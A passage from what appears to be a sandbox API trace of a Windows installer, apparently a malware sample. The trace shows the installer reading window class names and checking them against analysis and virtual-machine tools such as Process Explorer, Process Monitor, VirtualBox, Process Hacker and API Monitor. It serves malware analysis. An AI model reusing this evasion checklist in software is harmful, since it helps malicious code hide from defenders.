lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.458] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.458] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.459] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.459] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.459] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.459] lstrcpynA (in: lpString1=0x33723c, lpString2="user32::GetClassName(p r1, t.r3, i1024)", iMaxLength=1024 | out: lpString1="user32::GetClassName(p r1, t.r3, i1024)") returned="user32::GetClassName(p r1, t.r3, i1024)" [0158.459] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.459] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.459] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.459] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.459] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.459] lstrcpyA (in: lpString1=0x340df8, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.459] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.459] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.459] lstrcpynA (in: lpString1=0x340df8, lpString2="65848", iMaxLength=1024 | out: lpString1="65848") returned="65848" [0158.460] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.460] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.460] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.460] GetClassNameA (in: hWnd=0x10138, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="TaskSwitcherWnd") returned 15 [0158.460] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="1024") returned 4 [0158.460] lstrcpynA (in: lpString1=0x341200, lpString2="TaskSwitcherWnd", iMaxLength=1024 | out: lpString1="TaskSwitcherWnd") returned="TaskSwitcherWnd" [0158.460] lstrcpyA (in: lpString1=0x430c00, lpString2="TaskSwitcherWnd" | out: lpString1="TaskSwitcherWnd") returned="TaskSwitcherWnd" [0158.460] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="65848") returned 5 [0158.460] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.460] lstrlenA (lpString="0") returned 1 [0158.460] lstrcpynA (in: lpString1=0x42e3a0, lpString2="TaskSwitcherWnd", iMaxLength=1024 | out: lpString1="TaskSwitcherWnd") returned="TaskSwitcherWnd" [0158.460] lstrlenA (lpString="TaskSwitcherWnd") returned 15 [0158.460] lstrcpynA (in: lpString1=0x40ac18, lpString2="TaskSwitcherWnd", iMaxLength=1024 | out: lpString1="TaskSwitcherWnd") returned="TaskSwitcherWnd" [0158.460] lstrcpynA (in: lpString1=0x40b018, lpString2="PROCEXPL", iMaxLength=1024 | out: lpString1="PROCEXPL") returned="PROCEXPL" [0158.460] lstrcmpiA (lpString1="TaskSwitcherWnd", lpString2="PROCEXPL") returned 1 [0158.460] lstrcpynA (in: lpString1=0x42e3a0, lpString2="TaskSwitcherWnd", iMaxLength=1024 | out: lpString1="TaskSwitcherWnd") returned="TaskSwitcherWnd" [0158.460] lstrlenA (lpString="TaskSwitcherWnd") returned 15 [0158.460] lstrcpynA (in: lpString1=0x40ac18, lpString2="TaskSwitcherWnd", iMaxLength=1024 | out: lpString1="TaskSwitcherWnd") returned="TaskSwitcherWnd" [0158.460] lstrcpynA (in: lpString1=0x40b018, lpString2="PROCMON_WINDOW_CLASS", iMaxLength=1024 | out: lpString1="PROCMON_WINDOW_CLASS") returned="PROCMON_WINDOW_CLASS" [0158.460] lstrcmpiA (lpString1="TaskSwitcherWnd", lpString2="PROCMON_WINDOW_CLASS") returned 1 [0158.460] lstrcpynA (in: lpString1=0x42e3a0, lpString2="TaskSwitcherWnd", iMaxLength=1024 | out: lpString1="TaskSwitcherWnd") returned="TaskSwitcherWnd" [0158.460] lstrlenA (lpString="TaskSwitcherWnd") returned 15 [0158.460] lstrcpynA (in: lpString1=0x40ac18, lpString2="TaskSwitcherWnd", iMaxLength=1024 | out: lpString1="TaskSwitcherWnd") returned="TaskSwitcherWnd" [0158.461] lstrcpynA (in: lpString1=0x40b018, lpString2="VBoxTrayToolWndClass", iMaxLength=1024 | out: lpString1="VBoxTrayToolWndClass") returned="VBoxTrayToolWndClass" [0158.461] lstrcmpiA (lpString1="TaskSwitcherWnd", lpString2="VBoxTrayToolWndClass") returned -1 [0158.461] lstrcpynA (in: lpString1=0x42e3a0, lpString2="TaskSwitcherWnd", iMaxLength=1024 | out: lpString1="TaskSwitcherWnd") returned="TaskSwitcherWnd" [0158.461] lstrlenA (lpString="TaskSwitcherWnd") returned 15 [0158.461] lstrcpynA (in: lpString1=0x40ac18, lpString2="TaskSwitcherWnd", iMaxLength=1024 | out: lpString1="TaskSwitcherWnd") returned="TaskSwitcherWnd" [0158.461] lstrcpynA (in: lpString1=0x40b018, lpString2="VMSwitchUserControlClass", iMaxLength=1024 | out: lpString1="VMSwitchUserControlClass") returned="VMSwitchUserControlClass" [0158.461] lstrcmpiA (lpString1="TaskSwitcherWnd", lpString2="VMSwitchUserControlClass") returned -1 [0158.461] lstrcpynA (in: lpString1=0x42e3a0, lpString2="TaskSwitcherWnd", iMaxLength=1024 | out: lpString1="TaskSwitcherWnd") returned="TaskSwitcherWnd" [0158.461] lstrlenA (lpString="TaskSwitcherWnd") returned 15 [0158.461] lstrcpynA (in: lpString1=0x40ac18, lpString2="TaskSwitcherWnd", iMaxLength=1024 | out: lpString1="TaskSwitcherWnd") returned="TaskSwitcherWnd" [0158.461] lstrcpynA (in: lpString1=0x40b018, lpString2="ProcessLasso_Notification_Class", iMaxLength=1024 | out: lpString1="ProcessLasso_Notification_Class") returned="ProcessLasso_Notification_Class" [0158.461] lstrcmpiA (lpString1="TaskSwitcherWnd", lpString2="ProcessLasso_Notification_Class") returned 1 [0158.461] lstrcpynA (in: lpString1=0x42e3a0, lpString2="TaskSwitcherWnd", iMaxLength=1024 | out: lpString1="TaskSwitcherWnd") returned="TaskSwitcherWnd" [0158.461] lstrlenA (lpString="TaskSwitcherWnd") returned 15 [0158.461] lstrcpynA (in: lpString1=0x40ac18, lpString2="TaskSwitcherWnd", iMaxLength=1024 | out: lpString1="TaskSwitcherWnd") returned="TaskSwitcherWnd" [0158.461] lstrcpynA (in: lpString1=0x40b018, lpString2="SmartSniff", iMaxLength=1024 | out: lpString1="SmartSniff") returned="SmartSniff" [0158.461] lstrcmpiA (lpString1="TaskSwitcherWnd", lpString2="SmartSniff") returned 1 [0158.461] lstrcpynA (in: lpString1=0x42e3a0, lpString2="TaskSwitcherWnd", iMaxLength=1024 | out: lpString1="TaskSwitcherWnd") returned="TaskSwitcherWnd" [0158.461] lstrlenA (lpString="TaskSwitcherWnd") returned 15 [0158.461] lstrcpynA (in: lpString1=0x40ac18, lpString2="TaskSwitcherWnd", iMaxLength=1024 | out: lpString1="TaskSwitcherWnd") returned="TaskSwitcherWnd" [0158.461] lstrcpynA (in: lpString1=0x40b018, lpString2="ProcessHacker", iMaxLength=1024 | out: lpString1="ProcessHacker") returned="ProcessHacker" [0158.461] lstrcmpiA (lpString1="TaskSwitcherWnd", lpString2="ProcessHacker") returned 1 [0158.461] lstrcpynA (in: lpString1=0x42e3a0, lpString2="TaskSwitcherWnd", iMaxLength=1024 | out: lpString1="TaskSwitcherWnd") returned="TaskSwitcherWnd" [0158.461] lstrlenA (lpString="TaskSwitcherWnd") returned 15 [0158.461] lstrcpynA (in: lpString1=0x40ac18, lpString2="TaskSwitcherWnd", iMaxLength=1024 | out: lpString1="TaskSwitcherWnd") returned="TaskSwitcherWnd" [0158.461] lstrcpynA (in: lpString1=0x40b018, lpString2="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}", iMaxLength=1024 | out: lpString1="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}") returned="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}" [0158.461] lstrcmpiA (lpString1="TaskSwitcherWnd", lpString2="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}") returned 1 [0158.461] lstrcpynA (in: lpString1=0x42e3a0, lpString2="TaskSwitcherWnd", iMaxLength=1024 | out: lpString1="TaskSwitcherWnd") returned="TaskSwitcherWnd" [0158.461] lstrlenA (lpString="TaskSwitcherWnd") returned 15 [0158.461] lstrcpynA (in: lpString1=0x40ac18, lpString2="TaskSwitcherWnd", iMaxLength=1024 | out: lpString1="TaskSwitcherWnd") returned="TaskSwitcherWnd" [0158.461] lstrcpynA (in: lpString1=0x40b018, lpString2="SysAnalyzer", iMaxLength=1024 | out: lpString1="SysAnalyzer") returned="SysAnalyzer" [0158.462] lstrcmpiA (lpString1="TaskSwitcherWnd", lpString2="SysAnalyzer") returned 1 [0158.462] lstrcpynA (in: lpString1=0x42e3a0, lpString2="TaskSwitcherWnd", iMaxLength=1024 | out: lpString1="TaskSwitcherWnd") returned="TaskSwitcherWnd" [0158.462] lstrlenA (lpString="TaskSwitcherWnd") returned 15 [0158.462] lstrcpynA (in: lpString1=0x40ac18, lpString2="TaskSwitcherWnd", iMaxLength=1024 | out: lpString1="TaskSwitcherWnd") returned="TaskSwitcherWnd" [0158.462] lstrcpynA (in: lpString1=0x40b018, lpString2="VMSwitchUserControlClass", iMaxLength=1024 | out: lpString1="VMSwitchUserControlClass") returned="VMSwitchUserControlClass" [0158.462] lstrcmpiA (lpString1="TaskSwitcherWnd", lpString2="VMSwitchUserControlClass") returned -1 [0158.462] lstrcpynA (in: lpString1=0x42e3a0, lpString2="TaskSwitcherWnd", iMaxLength=1024 | out: lpString1="TaskSwitcherWnd") returned="TaskSwitcherWnd" [0158.462] lstrlenA (lpString="TaskSwitcherWnd") returned 15 [0158.462] lstrcpynA (in: lpString1=0x40ac18, lpString2="TaskSwitcherWnd", iMaxLength=1024 | out: lpString1="TaskSwitcherWnd") returned="TaskSwitcherWnd" [0158.462] lstrcpynA (in: lpString1=0x40b018, lpString2="ProcessHacker", iMaxLength=1024 | out: lpString1="ProcessHacker") returned="ProcessHacker" [0158.462] lstrcmpiA (lpString1="TaskSwitcherWnd", lpString2="ProcessHacker") returned 1 [0158.462] lstrcpynA (in: lpString1=0x42e3a0, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.462] lstrlenA (lpString="Task Switching") returned 14 [0158.462] lstrcpynA (in: lpString1=0x40ac18, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.462] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.462] lstrcmpiA (lpString1="Task Switching", lpString2="0") returned 1 [0158.462] lstrcpynA (in: lpString1=0x42e3a0, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.462] lstrlenA (lpString="Task Switching") returned 14 [0158.462] lstrcpynA (in: lpString1=0x33723c, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.462] lstrcpynA (in: lpString1=0x337684, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.462] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.462] lstrlenA (lpString="3399936") returned 7 [0158.462] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.462] lstrcpynA (in: lpString1=0x40a418, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.462] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.462] lstrcpynA (in: lpString1=0x337acc, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.462] lstrcpynA (in: lpString1=0x432800, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.463] lstrcpynA (in: lpString1=0x40a418, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.463] lstrcpynA (in: lpString1=0x33723c, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.463] lstrcpynA (in: lpString1=0x337684, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.463] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.463] lstrlenA (lpString="") returned 0 [0158.463] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.463] lstrcpynA (in: lpString1=0x40a418, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.463] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.463] lstrcpynA (in: lpString1=0x337acc, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.463] lstrcpynA (in: lpString1=0x432c00, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.463] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.463] lstrlenA (lpString="") returned 0 [0158.463] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.463] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.463] lstrlenA (lpString="") returned 0 [0158.463] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.463] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.463] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.463] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.463] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.463] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.463] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.463] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.464] lstrcpynA (in: lpString1=0x33835c, lpString2="ntdll::strstr(t R1, t R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.464] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.464] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.464] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.464] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.464] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.464] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.464] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.464] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.464] lstrcpynA (in: lpString1=0x3401e0, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.464] lstrcpynA (in: lpString1=0x341200, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.464] lstrcpynA (in: lpString1=0x3401e0, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.465] lstrcpynA (in: lpString1=0x340df8, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.465] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.465] strstr (_Str="Task Switching", _SubStr="- main thread") returned 0x0 [0158.465] lstrcpynA (in: lpString1=0x3401e0, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.465] lstrcpynA (in: lpString1=0x3401e0, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.465] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.465] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.465] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.465] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.465] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.465] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.465] lstrlenA (lpString="0") returned 1 [0158.465] lstrcpynA (in: lpString1=0x337684, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.465] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.465] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.465] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.465] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.465] lstrcpynA (in: lpString1=0x430000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.465] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.465] lstrlenA (lpString="0") returned 1 [0158.466] lstrcpynA (in: lpString1=0x42e3a0, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.466] lstrlenA (lpString="Task Switching") returned 14 [0158.466] lstrcpynA (in: lpString1=0x33723c, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.466] lstrcpynA (in: lpString1=0x337684, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.466] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.466] lstrlenA (lpString="3399936") returned 7 [0158.466] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.466] lstrcpynA (in: lpString1=0x40a418, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.466] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.466] lstrcpynA (in: lpString1=0x337acc, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.466] lstrcpynA (in: lpString1=0x432800, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.466] lstrcpynA (in: lpString1=0x40a418, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.466] lstrcpynA (in: lpString1=0x33723c, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.466] lstrcpynA (in: lpString1=0x337684, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.466] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.466] lstrlenA (lpString="") returned 0 [0158.466] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.466] lstrcpynA (in: lpString1=0x40a418, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.466] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.466] lstrcpynA (in: lpString1=0x337acc, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.466] lstrcpynA (in: lpString1=0x432c00, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.466] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.466] lstrlenA (lpString="") returned 0 [0158.466] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.467] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.467] lstrlenA (lpString="") returned 0 [0158.467] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.467] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.467] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.467] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.467] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.467] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.467] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.467] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.467] lstrcpynA (in: lpString1=0x33835c, lpString2="ntdll::strstr(t R1, t R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.467] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.467] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.467] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.467] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.467] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.468] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.468] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.468] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.468] lstrcpynA (in: lpString1=0x341200, lpString2="Task Switching", iMaxLength=1024 | out: 